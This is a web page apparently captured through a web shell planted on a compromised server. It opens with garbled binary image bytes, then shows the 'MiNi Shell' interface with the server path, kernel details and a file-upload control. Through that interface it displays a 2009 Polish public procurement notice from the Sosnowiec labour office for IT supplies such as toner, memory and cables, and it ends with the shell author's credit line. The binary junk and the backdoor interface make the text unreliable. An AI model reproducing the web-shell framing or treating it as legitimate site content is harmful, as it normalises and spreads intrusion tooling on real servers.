JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/166862-N-2009.html

<p class="kh_header"><b>Sosnowiec: Zakup i dostawa materiałów eksploatacyjnych  dla potrzeb informatyki Powiatowego Urzędu Pracy w Sosnowcu</b><br>
<b>Numer ogłoszenia: 166862 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Sosnowcu , ul. Rzeźnicza 12, 41-200 Sosnowiec, woj. śląskie, tel. 032 2661387, 2663424, 26636369, faks 032 2663635 w. 420, 508.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów eksploatacyjnych  dla potrzeb informatyki Powiatowego Urzędu Pracy w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów eksploatacyjnych dla potrzeb informatyki Powiatowego Urzędu Pracy w Sosnowcu  
L.P.	ARTYKUŁ	Kod CPV
1)	toner do drukarki HP Laser Jet 1012 Q2612A   - 350 szt.	30125110-5
2)	toner do drukarki HP Laser Jet 1200 C7115X   - 20 szt.	30125110-5
3)	toner do drukarki HP Laser Jet 2300 Q2610A   - 4 szt.	30125110-5
4)	toner do drukarki HP LaserJet 1300 Q2613A   - 10 szt.	30125110-5
5)	pamięć pendrive 8GB HI-SPEED USB2.0,  transfer odczytu na poziomie minimum 19 MB/s, zapis minimum 13 MB/s   - 10 szt.	30237230-3
6)	pamięć pendrive 2GB HI-SPEED USB2.0,  transfer odczytu na poziomie minimum 19 MB/s, zapis minimum 13 MB/s   - 10 szt.	30237230-3
7)	mysz komputerowa USB (przewodowa, optyczna, scroll, black, 1000dpi, USB/PS2,)   - 20 szt.	30237410-6
8)	klawiatura USB (odporna na zalanie, black,)   - 10 szt.	30237460-1
9)	zestaw bezprzewodowy black (klawiatura+mysz). Klawiatura: multimedialna, ergonomiczny kształt, podpórka pod nadgarstki, wskaźnik naładowania baterii. Mysz: laserowa, ilość przycisków - 4, wskaźnik naładowania baterii.   - 5 szt.	30237000-9
10)	głośniki komputerowe (ilośc głosników - 2, moc głosnika - RMS 5W, ekranowanie magnetyczne, regulacja głośności, wejście słuchawkowe)   - 10 szt.	32342412-3
11)	kamery internetowe, komputerowe (funkcja aparatu cyfrowego, typ czujnika CMOS, rozdzielczość wideo 640x480, mikrofon,)   - 3 szt.	30237240-3
12)	Toner purpurowy do drukarki HP LaserJet 4005N (CB403A)  - 2 szt.	30125110-5
13)	Toner niebieski do drukarki HP LaserJet 4005N (CB401A)   - 2 szt.	30125110-5
14)	Toner żółty do drukarki HP LaserJet 4005N (CB402A)   - 1 szt.	30125110-5
15)	Toner czarny do drukarki HP LaserJet 4005N (CB400A)   - 1 szt.	30125110-5
16)	Toner purpurowy do drukarki HP LaserJet CM1017 MFP (Q6003A)-1 szt.	30125110-5
17)	Toner niebieski do drukarki HP LaserJet CM1017 MFP (Q6001A)   - 1 szt.	30125110-5
18)	Toner żółty do drukarki HP LaserJet CM1017 MFP (Q6002A)   - 1 szt.	30125110-5
19)	Toner czarny do drukarki HP LaserJet CM1017 MFP (Q6000A)   - 2 szt.	30125110-5
20)	Toner purpurowy do drukarki HP LaserJet CM1312nfiMFP (CB543A)
- 2 szt.	30125110-5
21)	Toner niebieski do drukarki HP LaserJet CM1312nfiMFP (CB541A)   
- 2 szt.	30125110-5
22)	Toner żółty do drukarki HP LaserJet CM1312nfiMFP (CB542A)   - 2 szt.	30125110-5
23)	Toner czarny do drukarki HP LaserJet CM1312nfiMFP (CB540A)   
- 3 szt.	30125110-5
24)	Toner niebieski do drukarki HP LaserJet 2550 (Q3961A)   - 1 szt.	30125110-5
25) Toner purpurowy do drukarki HP LaserJet 2550 (Q3963A)   - 2 szt.	30125110-5
26)	powietrze sprężone 400ml   - 30 szt.	39830000-9
27)	pianka do monitorów LCD 100ml   - 15 szt.	39830000-9
28)	pianka do plastiku 400ml   - 15 szt.	39830000-9
29)	pianka do ekranów CRT 400ml   - 10 szt.	39830000-9
30)	filtr prywatyzujący na minitor LCD 17 (wykonany ze szkła standardowo przyciemnianego, pozwala na odczytanie informacji z ekranu tylko osobie patrzącej prostopadle na ekran)   - 50 szt.	38623000-9
31)	pamięć DDR2 800MHz 2GB   - 15 szt.	30237230-3
32)	pamięć do serwera DELL Poweredge 2900 8GB   - 4 szt.	30237230-3
33)	pamięć do serwera IBM 235Xseries 8GB   - 2 szt.	30237230-3
34)	pamięć DDR2 1066MHz 2x1GB pro   - 4 szt.	30237230-3
35)	pamięć DDR 512MB PC400   - 10 szt.	30237230-3
36)	płyta główna SOCKET775, chipset Intel P43, 6 sataII, ilość złączy PCI - 3, PCI-ex1 - 2, PCI-ex16 - 14 szt.	30237140-2
37)	prcesor SOCKET 775, proces technologiczny 0,045, częstotliwość taktowania 3166   - 4 szt.	30237000-9
38)	HDD 250GB SATA2, gwarancja 5lat, RAID EDITION3, cashe 16MB, MTBF 1200000 (WD2502ABYS)   - 4 szt.	32582000-6
39)	zasilacze 400W, wentylator 12cm, pasywne pfc, filtr: przeciwprzeciążeniowy, przeciwprzepięciowy, przeciwzwarciowy, automatyczna regulacja wentylatora   - 10 szt.	42522000-1
40)	profesjonalna zaciskarka uniwersalna do złącz modularnych: 10P10C/RJ48, AMP8P8C/RJ45, 6P6C/RJ12, 6P4C/RJ11, 4P4C N4P2C   
- 2 szt.	32520000-4
41)	dyskietki 3,5  - 20 szt.	30237320-8
42)	listwy zasilające 5m   - 20 szt.	30237280-5
43)	listwy zasilające 3m   - 10 szt.	30237280-5
44)	kabel UTP 305m kategoria 5e    - 1 opakowanie	44321000-6
45)	patchpanel 24porty kat. 5e   - 2 szt.	30230000-0
46)	router 4porty: 2 porty WAN, obsługa VPN   - 1 szt.	30230000-0
47)	Dysk 2,5 , 250GB, USB 2.0, 5400 RPM, 8MB c., zew., czarny (ST902503FADE1-RK)   - 1 szt.	32582000-6
48)	kabel paczkord 5m, kat. 5e   - 20 szt.	44321000-6
49)	wtyk RJ45 (100 sztuk)   - 1 opakowanie	31224100-3
50)	wentylator z radiatorem SOCKET A   - 5 szt.	42522000-1
51)	wentylator z radiatorem SOCKET 775   - 5 szt.	42522000-1
52)	wentylator z radiatorem SOCKET AM2   - 5 szt.	42522000-1
53)	zestaw pojemników i haczyków na narzędzia. - 1 szt.
Wymiary tablicy: 2x 452x540mm. Wymiary wewnętrzne pojemników: - 16x nr 1 (89x90x53mm), - 8x nr 2 (86x146x66mm), - 4x nr 2L (86x501x66mm). Uchwyty narzędziowe: - 1x uchwyt uniwersalny na 20 szt. narzędzi, - 1x wieszak do kluczy płaskich na 8 szt., - 1x półka na wiertła 1-10mm na 19 szt., - 6x haczyk 40mm., - 4x haczyk 30mm.  	44512940-3
54)	organizer o wymiarach 460mm x 330mm x 75 mm, plastikowy,   - 2 szt.	30193000-8
55)	kabel monitorowy 3m 15m/15m   - 10 szt.	44321000-6
56)	etykiety do drukarki ARGOX A200 2x1 cal białe (1000sztuk)  
 - 1 opakowanie	30192800-9
57)	cienkopisy do opisywania płyt (czarne, cienkie 0,5mm)   - 10 szt.	30192125-3
58)	płyty CD-R 700 MB, cake 100 sztuk   - 5 opakowań	30234300-1
59)	płyty DVD-R 4,7 MB, -R, cake 100 sztuk - 5 opakowań	30234300-2
60)	płyty CD-RW 700 MB, prędkość nagrywania x24, box 10 sztuk   
- 1 opakowanie	30234300-1
61)	płyty DVD-RW 4,7 MB, prędkość nagrywania x 8, box 10 sztuk  
 - 1 opakowanie	30234300-2
62)	koperty na płyty CD-R, DVD-R, koperta z okienkiem o średnicy 100mm, wymiary 130x130   - 1000 szt.	30199230-1
63)	tusz do drukarki HP Office Jet K8600 purpurowy (hp88xl)   - 3 szt.	30192113-6
65)	tusz do drukarki HP Office Jet K8600 niebieski (hp88xl)   - 3 szt.	30192113-6
66)	tusz do drukarki HP Office Jet K8600 żółty (hp88xl)   - 3 szt.	30192113-6
67)	głowica drukująca do drukarki HP Office Jet K8600 purpurowy, niebieski   - 1 szt.	30192113-6
68)	głowica drukująca do drukarki HP Office Jet K8600 czarny, żółty   - 1 szt.	30192113-6
69)	KOMPRESOR SPRĘŻARKA + PISTOLET   - 1 szt.
Moc znamionowa: 1,5hp; 1,1 kW (S3/25%) 
- Ilość obrotów 2850rpm 
- Napięcie zasilania: 230V, 50 Hz 
- Powietrze ssane: 200 l/min 
- Ciśnienie maksymalne: 8 bar 
- Waga: 6,5kg 
- Klasa izolacji: F 
- Wymiary: 400mm×380mm×230mm 
- Obudowa z mocnego tworzywa sztucznego 
- Posiada zabezpieczenie termiczne chroniące przed przegrzaniem 	42123000-7
70)	Przełącznik LPT (1komputer, 2drukarki+kable)   - 1 szt.	31214100-0
71)	koperty bąbelkowe na dyskietki 1,44, wymiar wewnętrzny: 110x160    
- 12 szt.	30199230-1
72)	koperty bąbelkowe na dokumenty A4, wymiar wewnętrzny: 230x330   
- 20 szt.	30199230-1
73)	podkładka pod mysz optyczną, warstwa spodnia wykonana z pianki przylegającej do podłoża, wymiary: 246x218    - 50 szt.	30237220-7
74)	listwa zabezpieczająca do kabli, wykonana z gumy, przylepiana do podłogi za pomocą taśmy, długość 1,8m   - 30 szt.	44300000-3
75)	multimedialny moduł szufladkowy do przechowywania płyt, dyskietek, regulowane przegródki, zamykany na kluczyk, możliwość piętrowego łączenia modułów   - 2 szt.	30193000-8
76)	osłona na kable wykonana z polipropylenu, długość osłony 2m, średnica 2-3 cm, aplikator ułatwiający umieszczanie kabli w osłonie - 30 szt.	44300000-3
77)	tuba do organizacji i osłony kabli przyczepiana do biurka, zamykana na zatrzask, wymiary: 390x95x30 - 30 szt.	44300000-3.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.23.72.30-3, 30.23.74.10-6, 30.23.74.60-1, 30.23.70.00-9, 32.34.24.12-3, 30.23.72.40-3, 39.83.00.00-9, 30.23.71.40-2, 32.58.20.00-6, 42.52.20.00-1, 32.52.00.00-4, 30.23.73.20-8, 30.23.72.80-5, 44.32.10.00-6, 30.23.00.00-0, 31.22.41.00-3, 44.51.29.40-3, 30.19.30.00-8, 30.19.28.00-9, 30.19.21.25-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.1	Ogólne warunki udziału w postępowaniu 

6.1.1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące  warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych                               ( Dz. U. z 2007 roku Nr 223 poz. 1655 z późn. zm.).

W  przypadku Wykonawców składających wspólną ofertę, warunki opisane ppkt a i d każdy  z partnerów musi wykazać odrębnie.   

6.2 .Warunki szczegółowe 

Potencjał ekonomiczno-finansowy

6.2.1.	Wykonawca musi wykazać posiadanie na rachunku bankowym środków finansowych w kwocie co najmniej 20.000  PLN  lub zdolność kredytową na kwotę 20.000 PLN
6.2.2.	Potencjał ekonomiczno finansowy Wykonawców składających wspólna ofertę: 
- warunki określone w punkcie 4.2.2. musi spełniać co najmniej jeden partner.  

Doświadczenie zawodowe

6.2.3	Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (rozpoczął i zakończył) co najmniej pięć zamówień o wartości porównywalnej z przedmiotem niniejszego zamówienia. 
6.2.4	Doświadczenie zawodowe wykonawców składających wspólną ofertę:
  - warunek określony w punkcie 4.2.3. musi być spełniony łącznie przez składających wspólną ofertę.    
6.2.5.   Podwykonawstwo 
  Zamawiający nie dopuszcza możliwości powierzenia części lub całości zamówienia 
do realizacji podwykonawcom. 



6 .3.  Ocena spełnienia warunków w postępowaniu o zamówienie publiczne

          Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu nastąpi poprzez analizę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, metodą spełnia - nie spełnia.
6.4. Wykaz oświadczeń i dokumentów, na podstawie których zostanie dokonana ocena spełnienia warunków udziału w postępowaniu przedstawiono w rozdziale VI niniejszej Specyfikacji.   
6.5  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
6.6.	Zamawiający odrzuca ofertę, która:
	jest niezgodna z ustawą 
	jej treść nie odpowiada treści specyfikacji istotnych warunków  zamówienia,                         z zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy,
	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                         o zwalczaniu nieuczciwej konkurencji,
	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu                       o udzielenie zamówienia,
	zawiera błędy w obliczeniu ceny, 
	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodzi się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy,
	jest nieważna na podstawie odrębnych przepisów.
6.7.	Zamawiający poprawia omyłki rachunkowe w obliczeniu ceny tylko w niżej wymieniony sposób:
1.	w przypadku mnożenia cen jednostkowych i liczby jednostek miar: 
a)	jeżeli obliczona cena nie odpowiada iloczynowi ceny jednostkowej oraz liczby jednostek miar, przyjmuje się, że prawidłowo podano liczbę jednostek miar oraz cenę jednostkową,
b)	jeżeli cenę jednostkową podano rozbieżnie słownie i liczbą, przyjmuje się, że prawidłowo podano liczbę jednostek miar i ten zapis ceny jednostkowej, który odpowiada dokonanemu obliczeniu ceny;
2.	w przypadku sumowania cen za poszczególne części zamówienia:
a)	jeżeli obliczona cena nie  odpowiada sumie cen za części zamówienia, przyjmuje się, że prawidłowo podano ceny za części zamówienia,
b)	jeżeli cenę za część zamówienia podano rozbieżnie słownie  i liczbą, przyjmuje się, że prawidłowo podano ten zapis, który odpowiada dokonanemu obliczeniu ceny,
c)	jeżeli ani cena za część zamówienia podana liczbą, ani podana słownie nie odpowiadają obliczonej cenie, przyjmuje się, że prawidłowo podano ceny za część zamówienia wyrażone słownie;
3.	w przypadku  oferty z ceną określoną za cały przedmiot zamówienia albo jego część ( cena ryczałtowa):
a)	przyjmuje się, że prawidłowo podano cenę ryczałtową bez względu na sposób jej obliczenia,
b)	jeżeli cena ryczałtowa podana liczbą nie odpowiada cenie ryczałtowej podanej słownie, przyjmuje się za prawidłową cenę ryczałtową podaną słownie,
c)	jeżeli obliczona cena nie odpowiada sumie cen  ryczałtowych, przyjmuje się, że prawidłowo podano poszczególne ceny ryczałtowe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie 
art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert;
b)	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby albo zamieszkania w zakresie określonym w art. 24                ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym                w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
d)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  
i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż                          3 miesiące przed upływem terminu składania ofert;
e)	oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007r.                     Nr 223 poz. 1655 z późn. zm.) z wykorzystaniem wzoru - Rozdział B;
f)	koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem.

6.2.	Dokumenty wymagane w przypadku Wykonawcy zamieszkałego poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1 ppkt. a, c, d, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne                      i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
6.3.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę                                           i doświadczenie (warunki szczegółowe), wykonawca składa dokument określający doświadczenie zawodowe tj.:  
a)	wykaz wykonanych zamówień w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Wykaz (zawierający co najmniej pięć zamówień porównywalnych wartościowo z przedmiotem niniejszego zamówienia) należy sporządzić wg wzoru rozdział B  - załącznik nr 2,
6.4.	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia, składa 
a)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej,  
w których Wykonawca posiada rachunek, potwierdzająca posiadanie  środków finansowych w kwocie co najmniej 20.000 PLN lub zdolność kredytową Wykonawcy w kwocie co najmniej 20.000 PLN, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert;   
 
6.5.	Formularz ofertowy, z wykorzystaniem wzoru, który został zamieszczony                        w rozdziale C pod nazwą Formularz oferty 

6.6.	Formularz cenowy,  z wykorzystaniem wzoru - rozdział C załącznik nr 3

6.7.	Uzupełniony wzór umowy, z wykorzystaniem wzoru - rozdział C 
załącznik  nr 4.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - termin realizacji zamówienia - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.sosnowiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy  Urząd   Pracy
       	ul. Rzeźnicza 12
      	41-200 Sosnowiec
       	Pokój nr 508, V piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: Powiatowy  Urząd   Pracy
       	ul. Rzeźnicza 12
      	41-200 Sosnowiec
       	Pokój nr 508, V piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający nie dopuszcza:
	składania ofert częściowych
	możliwości składania oferty wariantowej

2.	Zamawiający nie przewiduje:
	udzielania zamówień uzupełniających.
	zawarcia umowy ramowej.

Creat By MiNi SheLL
Email: jattceo@gmail.com